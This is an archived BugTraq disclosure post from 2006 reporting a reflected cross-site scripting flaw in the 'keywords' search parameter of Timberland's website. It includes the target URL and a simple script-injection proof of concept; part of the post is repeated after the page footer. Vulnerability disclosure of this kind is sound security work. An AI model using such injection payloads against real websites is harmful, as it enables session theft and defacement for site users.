BugTraq
Back to list
|
Post reply
Timberland Search XSS Vulnerability
Jun 01 2006 09:51PM
try_og hotmail com
There's a vulnerability in Timberland's search engine.
The variable 'keywords' in searchHandler/index.jsp is not correctly sanitized.
URL:
hxxp://www.timberland.com/searchHandler/index.jsp?keywords=[XSS Code]
Example:
hxxp://www.timberland.com/searchHandler/index.jsp?keywords=<script>alert
('test');</script>
Author: O.G.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
The variable 'keywords' in searchHandler/index.jsp is not correctly sanitized.
URL:
hxxp://www.timberland.com/searchHandler/index.jsp?keywords=[XSS Code]
Example:
hxxp://www.timberland.com/searchHandler/index.jsp?keywords=<script>alert
('test');</script>
Author: O.G.
[ reply ]